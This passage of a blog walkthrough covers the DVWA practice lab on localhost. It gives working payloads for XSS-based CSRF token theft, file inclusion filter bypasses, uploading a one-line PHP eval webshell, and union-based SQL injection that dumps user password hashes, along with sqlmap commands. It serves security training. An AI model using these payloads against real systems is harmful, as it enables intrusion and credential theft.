class="line">http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change&user_token=367c7e82e1c3e847203981e6d36ced78#</span><br></pre></td></tr></table></figure><p>A token is appended to the URL</p><p>The token can be popped up via XSS</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><img src="../csrf"onload=alert(frames[0].document.getElementsByName('user_token')[0].value)></span><br><span class="line">or</span><br><span class="line"><iframe src="../csrf"onload=alert(frames[0].document.getElementsByName('user_token')[0].value)></span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/22/ntNWvyJiuKwmsx6.png" alt="image-20220122224913629"></p><p>Appending the token stolen via XSS to the URL makes the attack succeed.</p><h3 id="文件包含"><a href="#文件包含" class="headerlink" title="File Inclusion"></a>File Inclusion</h3><p><strong>1.low</strong></p><p><img src="https://s2.loli.net/2022/01/23/jhqoLdEO8ty93Fk.png" alt="image-20220123153556747"></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// The page we wish to display</span></span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[ <span class="string">'page'</span> ];</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/23/4QoKAw3WLFcR19V.png" alt="image-20220123154324075"></p><p>phpinfo can be read directly</p><p>Local file inclusion:</p><figure class="highlight plaintext"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/fi/?page=D:\\wamp\\www\\DVWA\\phpinfo.php</span><br></pre></td></tr></table></figure><p>Remote file inclusion:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/fi/?page=http://127.0.0.1//DVWA//about.php</span><br></pre></td></tr></table></figure><p>It can also be read through the php protocol wrapper.</p><p><img src="https://s2.loli.net/2022/01/23/drFse42uZlUKTvQ.png" alt="image-20220123155108903"></p><p><strong>2.medium</strong></p><p>Input is validated: disallowed character sequences are replaced.</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Input validation</span></span><br><span class="line"><span class="variable">$file</span> = <span class="title function_ invoke__">str_replace</span>( <span class="keyword">array</span>( <span class="string">"http://"</span>, <span class="string">"https://"</span> ), <span class="string">""</span>, <span class="variable">$file</span> );</span><br><span class="line"><span class="variable">$file</span> = <span class="title function_ invoke__">str_replace</span>( <span class="keyword">array</span>( <span class="string">"../"</span>, <span class="string">"..\\"</span> ), <span class="string">""</span>, <span class="variable">$file</span> );</span><br></pre></td></tr></table></figure><p>The <code>str_replace</code> function is unsafe here because it makes a single pass, so it can be bypassed by doubling the filtered string.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/fi/?page=htthttp://p://127.0.0.1//123.txt</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/fi/?page=....//....//....//123.txt</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/fi/?page=..././..././..././123.txt</span><br></pre></td></tr></table></figure><p><strong>3.high</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// The page we wish to display</span></span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[ <span class="string">'page'</span> ];</span><br><span class="line"></span><br><span class="line"><span class="comment">// Input validation</span></span><br><span class="line"><span class="keyword">if</span>( !<span class="title function_ invoke__">fnmatch</span>( <span class="string">"file*"</span>, <span class="variable">$file</span> ) && <span class="variable">$file</span> != <span class="string">"include.php"</span> ) {</span><br><span class="line"> <span class="comment">// This isn't the page we want!</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"ERROR: File not found!"</span>;</span><br><span class="line"> <span 
class="keyword">exit</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file://D://wamp//install.txt</span><br></pre></td></tr></table></figure><p>The payload is as follows:</p><p>Create a new file 123.txt</p><figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line">phpinfo();</span><br><span class="line">?></span><br><span class="line">hello world</span><br><span class="line">@@@@@</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/23/JXWfPOl2ZY41ybk.png" alt="image-20220123200007635"></p><h3 id="文件上传"><a href="#文件上传" class="headerlink" title="File Upload"></a>File Upload</h3><p><strong>1.low</strong></p><p>There are no restrictions; files can be uploaded directly</p><p>The file size is limited, but that limit is enforced on the front end and can be changed there.</p><p>Upload a one-line webshell, then attack by passing parameters via GET.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/hackable/uploads/cmd.php?cmd=system(%22dir%22);</span><br></pre></td></tr></table></figure><p><strong>2.medium</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_POST</span>[ <span class="string">'Upload'</span> ] ) ) {</span><br><span class="line"> <span class="comment">// Where are we going to be writing to?</span></span><br><span class="line"> <span class="variable">$target_path</span> = DVWA_WEB_PAGE_TO_ROOT . 
<span class="string">"hackable/uploads/"</span>;</span><br><span class="line"> <span class="variable">$target_path</span> .= <span class="title function_ invoke__">basename</span>( <span class="variable">$_FILES</span>[ <span class="string">'uploaded'</span> ][ <span class="string">'name'</span> ] );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// File information</span></span><br><span class="line"> <span class="variable">$uploaded_name</span> = <span class="variable">$_FILES</span>[ <span class="string">'uploaded'</span> ][ <span class="string">'name'</span> ];</span><br><span class="line"> <span class="variable">$uploaded_type</span> = <span class="variable">$_FILES</span>[ <span class="string">'uploaded'</span> ][ <span class="string">'type'</span> ];</span><br><span class="line"> <span class="variable">$uploaded_size</span> = <span class="variable">$_FILES</span>[ <span class="string">'uploaded'</span> ][ <span class="string">'size'</span> ];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Is it an image?</span></span><br><span class="line"> <span class="keyword">if</span>( ( <span class="variable">$uploaded_type</span> == <span class="string">"image/jpeg"</span> || <span class="variable">$uploaded_type</span> == <span class="string">"image/png"</span> ) &&</span><br><span class="line"> ( <span class="variable">$uploaded_size</span> < <span class="number">100000</span> ) ) {</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Can we move the file to the upload folder?</span></span><br><span class="line"> <span class="keyword">if</span>( !<span class="title function_ invoke__">move_uploaded_file</span>( <span class="variable">$_FILES</span>[ <span class="string">'uploaded'</span> ][ <span class="string">'tmp_name'</span> ], <span class="variable">$target_path</span> ) ) {</span><br><span class="line"> <span class="comment">// No</span></span><br><span 
class="line"> <span class="keyword">echo</span> <span class="string">'<pre>Your image was not uploaded.</pre>'</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// Yes!</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre><span class="subst">{$target_path}</span> succesfully uploaded!</pre>"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// Invalid file</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>The upload checks the file type, allowing only JPEG/PNG.</p><p>This can be bypassed by changing the file extension</p><p>First write a one-line webshell</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">@<span class="keyword">eval</span>(<span class="variable">$_REQUEST</span>[<span class="string">'cmd'</span>]);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>Rename the file to cmd.php.jpeg or cmd.jpeg</p><p>Then capture the request with Burp Suite, change the file name back to a .php extension, and replay it; the upload succeeds.</p><p><img src="https://s2.loli.net/2022/01/23/RplHcGeLoSiq12O.png" alt="image-20220123234346994"></p><p>As can be seen, the upload succeeded</p><p><img src="https://s2.loli.net/2022/01/23/W4l5QNShyo8Aawm.png" alt="image-20220123234449958"></p><p>Then connect with AntSword.</p><p>Got it!</p><p><img 
src="C:\Users\loeoe\AppData\Roaming\Typora\typora-user-images\image-20220123234540979.png" alt="image-20220123234540979"></p><p>Parameters can also be passed directly via GET.</p><p><img src="https://s2.loli.net/2022/01/23/B38eH9fJxVuFgYO.png" alt="image-20220123235016536"></p><p><img src="https://s2.loli.net/2022/01/23/49gvm5fWYMH3qzs.png" alt="image-20220123235708181"></p><p><strong>3.high</strong></p><p>Alternatively, change the file header to: GIF89</p><p>Build an image with an embedded webshell and upload it.</p><p>Command:</p><p><img src="https://s2.loli.net/2022/01/24/jsvpPROXce8QZoy.png" alt="image-20220124001307489"></p><p><img src="https://s2.loli.net/2022/01/24/bYmp9LRD1GjkCV2.png" alt="image-20220124000341406"></p><p>Then exploit it through the remote file inclusion vulnerability, or the "command injection vulnerability".</p><p><img src="https://s2.loli.net/2022/01/24/V8e1XuvZQNDR3Ex.png" alt="image-20220124001628374"></p><h3 id="不安全验证码"><a href="#不安全验证码" class="headerlink" title="Insecure CAPTCHA"></a>Insecure CAPTCHA</h3><p>This requires the Google API, which the lab environment does not have.</p><p>Essentially, it exploits a logic flaw in the CAPTCHA check: the request parameters are modified to bypass it.</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span 
class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_POST</span>[ <span class="string">'Change'</span> ] ) && ( <span class="variable">$_POST</span>[ <span class="string">'step'</span> ] == <span class="string">'1'</span> ) ) {</span><br><span class="line"> <span class="comment">// Hide the CAPTCHA form</span></span><br><span class="line"> <span class="variable">$hide_form</span> = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Get 
input</span></span><br><span class="line"> <span class="variable">$pass_new</span> = <span class="variable">$_POST</span>[ <span class="string">'password_new'</span> ];</span><br><span class="line"> <span class="variable">$pass_conf</span> = <span class="variable">$_POST</span>[ <span class="string">'password_conf'</span> ];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Check CAPTCHA from 3rd party</span></span><br><span class="line"> <span class="variable">$resp</span> = <span class="title function_ invoke__">recaptcha_check_answer</span>(</span><br><span class="line"> <span class="variable">$_DVWA</span>[ <span class="string">'recaptcha_private_key'</span>],</span><br><span class="line"> <span class="variable">$_POST</span>[<span class="string">'g-recaptcha-response'</span>]</span><br><span class="line"> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Did the CAPTCHA fail?</span></span><br><span class="line"> <span class="keyword">if</span>( !<span class="variable">$resp</span> ) {</span><br><span class="line"> <span class="comment">// What happens when the CAPTCHA was entered incorrectly</span></span><br><span class="line"> <span class="variable">$html</span> .= <span class="string">"<pre><br />The CAPTCHA was incorrect. Please try again.</pre>"</span>;</span><br><span class="line"> <span class="variable">$hide_form</span> = <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// CAPTCHA was correct. 
Do both new passwords match?</span></span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$pass_new</span> == <span class="variable">$pass_conf</span> ) {</span><br><span class="line"> <span class="comment">// Show next stage for the user</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"</span></span><br><span class="line"><span class="string"> <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre></span></span><br><span class="line"><span class="string"> <form action=\"#\" method=\"POST\"></span></span><br><span class="line"><span class="string"> <input type=\"hidden\" name=\"step\" value=\"2\" /></span></span><br><span class="line"><span class="string"> <input type=\"hidden\" name=\"password_new\" value=\"<span class="subst">{$pass_new}</span>\" /></span></span><br><span class="line"><span class="string"> <input type=\"hidden\" name=\"password_conf\" value=\"<span class="subst">{$pass_conf}</span>\" /></span></span><br><span class="line"><span class="string"> <input type=\"submit\" name=\"Change\" value=\"Change\" /></span></span><br><span class="line"><span class="string"> </form>"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// Both new passwords do not match.</span></span><br><span class="line"> <span class="variable">$html</span> .= <span class="string">"<pre>Both passwords must match.</pre>"</span>;</span><br><span class="line"> <span class="variable">$hide_form</span> = <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_POST</span>[ <span class="string">'Change'</span> ] ) && ( <span 
class="variable">$_POST</span>[ <span class="string">'step'</span> ] == <span class="string">'2'</span> ) ) {</span><br><span class="line"> <span class="comment">// Hide the CAPTCHA form</span></span><br><span class="line"> <span class="variable">$hide_form</span> = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Get input</span></span><br><span class="line"> <span class="variable">$pass_new</span> = <span class="variable">$_POST</span>[ <span class="string">'password_new'</span> ];</span><br><span class="line"> <span class="variable">$pass_conf</span> = <span class="variable">$_POST</span>[ <span class="string">'password_conf'</span> ];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Check to see if both password match</span></span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$pass_new</span> == <span class="variable">$pass_conf</span> ) {</span><br><span class="line"> <span class="comment">// They do!</span></span><br><span class="line"> <span class="variable">$pass_new</span> = ((<span class="keyword">isset</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>]) && <span class="title function_ invoke__">is_object</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>])) ? <span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>], <span class="variable">$pass_new</span> ) : ((<span class="title function_ invoke__">trigger_error</span>(<span class="string">"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work."</span>, E_USER_ERROR)) ? 
<span class="string">""</span> : <span class="string">""</span>));</span><br><span class="line"> <span class="variable">$pass_new</span> = <span class="title function_ invoke__">md5</span>( <span class="variable">$pass_new</span> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Update database</span></span><br><span class="line"> <span class="variable">$insert</span> = <span class="string">"UPDATE `users` SET password = '<span class="subst">$pass_new</span>' WHERE user = '"</span> . <span class="title function_ invoke__">dvwaCurrentUser</span>() . <span class="string">"';"</span>;</span><br><span class="line"> <span class="variable">$result</span> = <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>], <span class="variable">$insert</span> ) <span class="keyword">or</span> <span class="keyword">die</span>( <span class="string">'<pre>'</span> . ((<span class="title function_ invoke__">is_object</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>])) ? <span class="title function_ invoke__">mysqli_error</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>]) : ((<span class="variable">$___mysqli_res</span> = <span class="title function_ invoke__">mysqli_connect_error</span>()) ? <span class="variable">$___mysqli_res</span> : <span class="literal">false</span>)) . 
<span class="string">'</pre>'</span> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Feedback for the end user</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre>Password Changed.</pre>"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// Issue with the passwords matching</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre>Passwords did not match.</pre>"</span>;</span><br><span class="line"> <span class="variable">$hide_form</span> = <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> ((<span class="title function_ invoke__">is_null</span>(<span class="variable">$___mysqli_res</span> = <span class="title function_ invoke__">mysqli_close</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>]))) ? 
<span class="literal">false</span> : <span class="variable">$___mysqli_res</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h3 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL Injection</h3><p><strong>1.low</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_REQUEST</span>[ <span class="string">'Submit'</span> ] ) ) {</span><br><span class="line"> <span class="comment">// Get input</span></span><br><span class="line"> <span class="variable">$id</span> = <span class="variable">$_REQUEST</span>[ <span class="string">'id'</span> ];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Check database</span></span><br><span class="line"> <span class="variable">$query</span> = <span class="string">"SELECT first_name, last_name FROM users WHERE user_id = '<span class="subst">$id</span>';"</span>;</span><br><span class="line"> <span class="variable">$result</span> = <span class="title function_ 
invoke__">mysqli_query</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>], <span class="variable">$query</span> ) <span class="keyword">or</span> <span class="keyword">die</span>( <span class="string">'<pre>'</span> . ((<span class="title function_ invoke__">is_object</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>])) ? <span class="title function_ invoke__">mysqli_error</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>]) : ((<span class="variable">$___mysqli_res</span> = <span class="title function_ invoke__">mysqli_connect_error</span>()) ? <span class="variable">$___mysqli_res</span> : <span class="literal">false</span>)) . <span class="string">'</pre>'</span> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Get results</span></span><br><span class="line"> <span class="keyword">while</span>( <span class="variable">$row</span> = <span class="title function_ invoke__">mysqli_fetch_assoc</span>( <span class="variable">$result</span> ) ) {</span><br><span class="line"> <span class="comment">// Get values</span></span><br><span class="line"> <span class="variable">$first</span> = <span class="variable">$row</span>[<span class="string">"first_name"</span>];</span><br><span class="line"> <span class="variable">$last</span> = <span class="variable">$row</span>[<span class="string">"last_name"</span>];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Feedback for end user</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre>ID: <span class="subst">{$id}</span><br />First name: <span class="subst">{$first}</span><br />Surname: <span class="subst">{$last}</span></pre>"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">mysqli_close</span>(<span 
class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>]);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>The id is concatenated straight into the query inside single quotes, so start with the input <code>1' and 1=1</code>.</p><p>Error:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1</span><br></pre></td></tr></table></figure><p>The injected quote leaves the query's own closing quote dangling, so comment it out: <code>1' and 1=1 #</code></p><p><img src="https://s2.loli.net/2022/01/24/cDxUblytOJ1wBgZ.png" alt="image-20220124213648935"></p><p>Determine the number of columns with <code>1' order by 1 #</code>, raising the number each time.</p><p><code>order by 3</code> produces an error,</p><p>so the query returns only two columns.</p><p>Find which columns are echoed back: <code>1' union select 1,2 #</code></p><p>Then substitute queries into those positions.</p><p><img src="https://s2.loli.net/2022/01/24/RqZrntC85kxKHST.png" alt="image-20220124220733662"></p><p>List the tables. This payload has no trailing <code>#</code>: the query's own closing quote terminates the <code>'dvwa</code> literal.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' union select 1,table_name from information_schema.tables where table_schema='dvwa</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/24/34ugY8AqWQDfabZ.png" alt="image-20220124221050252"></p><p>If there are many tables, collapse them into one row:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa</span><br></pre></td></tr></table></figure><p>Then list the columns of the users table:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/24/RxHAEnGBSiTW3ak.png" alt="image-20220124221524714"></p><p>Finally pull the credentials, one group_concat per echoed column:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' union select group_concat(user_id,first_name,last_name),group_concat(user,password) from users #</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/24/Gw1tvacdhSgZU8z.png" alt="image-20220124221846909"></p><p>The passwords are unsalted MD5 hashes, so a hash lookup or a wordlist cracker recovers them:</p><p><img src="https://s2.loli.net/2022/01/24/8XH3QWv9IpcJq5A.png" alt="image-20220124221948385"></p><p><img src="https://s2.loli.net/2022/01/26/HogpKf8xjsiatkd.png" alt="image-20220126190404257"></p><p>The same enumeration can be automated with sqlmap; the cookie carries the session and the chosen security level:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; security_level=0; PHPSESSID=2skes96bbgh4hn8js60vknurp1" -D dvwa -T users --columns</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/26/sGvC79Rh6MT1rqe.png" alt="image-20220126191946435"></p><p><strong>2.medium</strong></p><p><img src="https://s2.loli.net/2022/01/24/aEw91XOGAWKBukU.png" alt="image-20220124231311544"></p><p>The form no longer lets you type the id yourself.</p><p><img src="https://s2.loli.net/2022/01/24/uOy49EhINML6Bne.png" alt="image-20220124224410909"></p><p>Capture the POST request with Burp Suite and edit the parameter there:</p><p><img src="https://s2.loli.net/2022/01/24/o2UJIdgZqbtwNzs.png" alt="image-20220124224442044"></p><p><code>id=1 or 1=1#&Submit=Submit</code></p><p><img src="https://s2.loli.net/2022/01/24/UFYZXroLMngClAR.png" alt="image-20220124224747335"></p><p><img src="https://s2.loli.net/2022/01/24/JkoamMLNxgdEGKO.png" alt="image-20220124224948257"></p><p>The id is numeric at this level (no quotes around it), so no quote is needed to break out and the rest of the injection proceeds as in Low.</p><p><img src="https://s2.loli.net/2022/01/24/pklj56ZqeiGwW7O.png" alt="image-20220124230216520"></p><p>Single quotes are escaped here, so quoted string literals such as <code>'users'</code> no longer work. Supply them as a hex literal (<code>table_name=0x7573657273</code>) or build them with a MySQL function such as <code>char()</code> instead.</p><p><img src="https://s2.loli.net/2022/01/24/vCZJIKSzGfRhsVY.png" alt="image-20220124230508389"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">s=<span class="string">'users'</span>.encode(<span class="string">'utf-8'</span>)</span><br><span class="line"><span class="built_in">print</span>(s.<span class="built_in">hex</span>())</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/24/a3i6OJvGoNzwWfS.png" alt="image-20220124231444083"></p><p>The POST can also be submitted with HackBar.</p><p>Alternatively, capture the request with Burp, save it to a file and hand that file to sqlmap with <code>-r</code>.</p><p><strong>3.high</strong></p><p>The id is entered on a separate page and the result is displayed on the original one, which defeats a plain sqlmap run against a single URL.</p><p><img src="https://s2.loli.net/2022/01/24/fgWtSdFAP2lCpJy.png" alt="image-20220124233237791"></p><p>In sqlmap, use <code>--second-url</code> to name the page where the result is rendered, then inject as before.</p><h3 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>Blind SQL Injection</h3><p><strong>1.low</strong></p><p><img src="https://s2.loli.net/2022/01/26/gUuRlS6tnTAp4XQ.png" alt="image-20220126214941988"></p><p><img src="https://s2.loli.net/2022/01/26/RE98YaAZDiH3FJX.png" alt="image-20220126221926938"></p><p>The page only reports whether the ID exists, and a quoted payload flips that answer: a string-type injection exists, so the data has to be pulled out one true/false question at a time.</p><p>First determine the length of the database name:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1' and length(database())=1#</span><br><span class="line">1' and length(database())=2#</span><br><span class="line">1' and length(database())=3#</span><br><span class="line">1' and length(database())=4#   (this one reports "exists": the name is 4 characters long)</span><br></pre></td></tr></table></figure><p>Then recover it character by character:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td 